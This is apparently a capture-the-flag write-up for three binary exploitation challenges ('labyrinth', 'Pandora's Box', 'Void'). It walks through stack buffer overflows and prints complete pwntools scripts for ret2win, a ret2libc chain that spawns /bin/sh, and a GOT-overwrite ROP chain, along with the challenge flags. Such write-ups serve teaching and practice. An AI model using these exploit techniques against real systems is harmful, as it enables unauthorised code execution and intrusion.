 NX: NX enabled
 PIE: No PIE (0x400000)
 RUNPATH: b'./glibc/'

Use IDA Pro to analyze, we obtain the following pseudocode for function escape_plan

int escape_plan()
{
 char buf; // [rsp+Bh] [rbp-5h] BYREF
 int fd; // [rsp+Ch] [rbp-4h]

 putchar(10);
 fwrite(&unk_402018, 1uLL, 0x1F0uLL, _bss_start);
 fprintf(
 _bss_start,
 "\n%sCongratulations on escaping! Here is a sacred spell to help you continue your journey: %s\n",
 "\x1B[1;32m",
 "\x1B[0m");
 fd = open("./flag.txt", 0);
 if ( fd < 0 )
 {
 perror("\nError opening flag.txt, please contact an Administrator.\n\n");
 exit(1);
 }
 while ( read(fd, &buf, 1uLL) > 0 )
 fputc(buf, _bss_start);
 return close(fd);
}

Our goal is to be able to execute this function, now examine the main function

int __cdecl main(int argc, const char **argv, const char **envp)
{
 char v4[8]; // [rsp+0h] [rbp-30h] BYREF
 __int64 v5; // [rsp+8h] [rbp-28h]
 __int64 v6; // [rsp+10h] [rbp-20h]
 __int64 v7; // [rsp+18h] [rbp-18h]
 char *s; // [rsp+20h] [rbp-10h]
 unsigned __int64 i; // [rsp+28h] [rbp-8h]

 setup(argc, argv, envp);
 banner();
 *(_QWORD *)v4 = 0LL;
 v5 = 0LL;
 v6 = 0LL;
 v7 = 0LL;
 fwrite("\nSelect door: \n\n", 1uLL, 0x10uLL, _bss_start);
 for ( i = 1LL; i <= 0x64; ++i )
 {
 if ( i > 9 )
 {
 if ( i > 0x63 )
 fprintf(_bss_start, "Door: %d ", i);
 else
 fprintf(_bss_start, "Door: 0%d ", i);
 }
 else
 {
 fprintf(_bss_start, "Door: 00%d ", i);
 }
 if ( !(i % 0xA) && i )
 putchar(10);
 }
 fwrite("\n>> ", 1uLL, 4uLL, _bss_start);
 s = (char *)malloc(0x10uLL);
 fgets(s, 5, stdin);
 if ( !strncmp(s, "69", 2uLL) || !strncmp(s, "069", 3uLL) )
 {
 fwrite(
 "\n"
 "You are heading to open the door but you suddenly see something on the wall:\n"
 "\n"
 "\"Fly like a bird and be free!\"\n"
 "\n"
 "Would you like to change the door you chose?\n"
 "\n"
 ">> ",
 1uLL,
 0xA0uLL,
 _bss_start);
 fgets(v4, 68, stdin);
 }
 fprintf(_bss_start, "\n%s[-] YOU FAILED TO ESCAPE!\n\n", "\x1B[1;31m");
 return 0;
}

There is a buffer overflow associate with this line of code fgets(v4, 68, stdin); because v4 was declared char v4[8]; but we are allowed to input up to 68 bytes and we need to input ‘69’ at first. Our attack plan will be overwrite the return address with the address of function escape_plan. IDA also provides us stack offset of variable v4 which is [rbp-30h], so we can calculate the correct padding which is equal 0x30 + 8 = 0x38 = 56. The stack frame layout will be

|_______________|
| |
| "A"*56 |
| |
|_______________|
| |
|ret instruction| # padding ret because of movaps instruction
|_______________|
| |
| escape_plan |
|_______________|
| . |

We can use ROPgadget to find the address of instruction ret

$ ROPgadget --binary labyrinth | grep "ret"
0x0000000000401016 : ret

We yield the final exploit

#!/usr/bin/env python3

from pwn import *

exe = ELF("./labyrinth")

context.binary = exe

p = remote("167.71.143.44",31869)
# p = process('./labyrinth')

p.recvuntil(b'>> ')
p.sendline(b'69')

p.recvuntil(b'>> ')
ret = 0x0000000000401016
payload = b'A'*56 + p64(ret)+ p64(exe.sym['escape_plan'])
p.sendline(payload)
p.interactive()

Flag is: HTB{3sc4p3_fr0m_4b0v3}

Pandora’s Box

Given file: Get it here!
Description: You stumbled upon one of Pandora’s mythical boxes. Would you be curious enough to open it and see what’s inside, or would you opt to give it to your team for analysis?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Binary Exploitation/Pwnable
Difficulty: Easy

The challenge greeted us with a binary following a libc.so.6 and a ld-linux-x86-64.so.2.

Decompile the binary using IDA Pro, we easily found the vulnerability lied within the box() fucntion.

size_t box()
{
 char s[8]; // [rsp+0h] [rbp-30h] BYREF
 __int64 v2; // [rsp+8h] [rbp-28h]
 __int64 v3; // [rsp+10h] [rbp-20h]
 __int64 v4; // [rsp+18h] [rbp-18h]
 unsigned __int64 num; // [rsp+28h] [rbp-8h]

 *(_QWORD *)s = 0LL;
 v2 = 0LL;
 v3 = 0LL;
 v4 = 0LL;
 fwrite(
 "This is one of Pandora's mythical boxes!\n"
 "\n"
 "Will you open it or Return it to the Library for analysis?\n"
 "\n"
 "1. Open.\n"
 "2. Return.\n"
 "\n"
 ">> ",
 1uLL,
 0x7EuLL,
 _bss_start);
 num = read_num();
 if ( num != 2 )
 {
 fprintf(_bss_start, "%s\nWHAT HAVE YOU DONE?! WE ARE DOOMED!\n\n", "\x1B[1;31m");
 exit(1312);
 }
 fwrite("\nInsert location of the library: ", 1uLL, 0x21uLL, _bss_start);
 fgets(s, 256, stdin);
 return fwrite(
 "\nWe will deliver the mythical box to the Library for analysis, thank you!\n\n",
 1uLL,
 75uLL,
 _bss_start);
}

A classic buffer overflow exploitation. Howerver, this time there was no win function to print out the flag so we had to get a shell using ret2libc technique. The binary has no Canary nor PIE enable so we didn’t need to leak anything other than the libc address.

Using gdb we knew that the offset from our input buffer to the return address of box() is 56 bytes long.

Our 1st ROP chain would be to leak the address of the puts() function from the GOT table using the puts() function itself.

The 2nd ROP chain was used to call the system() function from the libc with the argument string being “/bin/sh”. I didn’t use one_gadget since none of the provided gadgets worked.

The other gadgets such as pop rdi ; ret you can get them using ROPgadget or Ropper

Here’s the exploit script.

from pwn import *

exe = ELF('./pb')
libc = ELF('./libc.so.6')
io = remote('68.183.37.122', 30673)
#io = exe.process()
#gdb.attach(io, api=True)
# Gadgets:
pad = b'i'*56
pop_rdi = 0x000000000040142b
binsh = 0x1d8698
ret = 0x00000000004013a5

# 1st chain leak libc
io.recvuntil(b'\n>> ')
io.sendline(b'2')
io.recvuntil(b'library: ')
payload = pad + p64(pop_rdi) + p64(exe.got['puts']) + p64(exe.plt['puts']) + p64(exe.sym['main'])
io.sendline(payload)
io.recvuntil(b'thank you!\n\n')
leak_puts = u64(io.recvline(keepends=False).ljust(8, b'\x00'))
libc.address = leak_puts - libc.sym['puts']

# 2nd chain get shell
io.recvuntil(b'\n>> ')
io.sendline(b'2')
io.recvuntil(b'library: ')
print(hex(libc.sym['system']))
payload = pad + p64(ret) + p64(pop_rdi) + p64(libc.address + binsh) + p64(libc.sym['system'])
io.sendline(payload)

io.interactive()

Flag is: HTB{r3turn_2_P4nd0r4?!}

Void

Given file: Get it here!
Description: The room goes dark and all you can see is a damaged terminal. Hack into it to restore the power and find your way out.
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Binary Exploitation/Pwnable
Difficulty: Medium

The program is simple, buffer overflow occurs in function vuln, here is the pseudocode of vuln.

ssize_t vuln()
{
 char buf[64]; // [rsp+0h] [rbp-40h] BYREF

 return read(0, buf, 0xC8uLL);
}

I found a similar write-up for this challenge here. The main idea is to ultilize ROP gadgets to spawn a shell, there is an interesting gadget allows us to modify memory by adding a 32 bit value to that memory, let call this add_gadget.

$ ROPgadget --binary void | grep "ebx"
0x0000000000401108 : add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret

Our attack plan

Stage 1 store string “/bin/sh” in .bss section.
Stage 2 change read@GOT to system@GOT by adding an offset between read@GOT and system@GOT.
Stage 3 call read@plt with /bin/sh.

Our used gadgets in exploit script

rdi = 0x00000000004011bb : pop rdi ; ret
rsi_r15 = 0x00000000004011b9 : pop rsi ; pop r15 ; ret
add_gadget = 0x0000000000401108 : add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret
gadget = 0x00000000004011b2 : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret

Here is the exploit script

from pwn import *

context.arch = 'amd64'

p = remote('138.68.162.218', 30569)
# p = process('./void')

libc_elf = ELF("./libc.so.6")
elf = ELF("./void")

read_got = elf.got['read']
libc_system = libc_elf.symbols['system']
libc_read = libc_elf.symbols['read']

system_offset = libc_system - libc_read
log.info('system offset in libc from read: {}'.format(hex(system_offset)))
system_offset = system_offset & 0xffffffffffffffff
log.info('Twos complement of this offset: {}'.format(hex(system_offset)))

binsh_addr = elf.bss() + 0x10
log.info('/bin/sh string Address: {}'.format(hex(binsh_addr)))

rsi_r15 = 0x00000000004011b9
gadget = 0x004011b2
add_gadget = 0x0000000000401108
rdi = 0x00000000004011bb
ret = 0x0000000000401016

# stage 1 store string "/bin/sh" in .bss section
payload = b'A'*0x48
payload += p64(rsi_r15) + p64(binsh_addr) + p64(0)
payload += p64(elf.plt['read'])
# Stage 2 change read@GOT to system@GOT
payload += p64(gadget)
payload += p64(system_offset) + p64(elf.got['read'] + 0x3d) + p64(0)*4
payload += p64(add_gadget)
# call read("/bin/sh") = system("/bin/sh")
payload += p64(rdi) + p64(binsh_addr)
payload += p64(ret) # padding ret 
payload += p64(elf.plt['read'])

p.send(payload+b'/bin/sh\x00')

p.interactive()

Flag is: HTB{r3s0lv3_th3_d4rkn355}

Original Posts

From FazeCT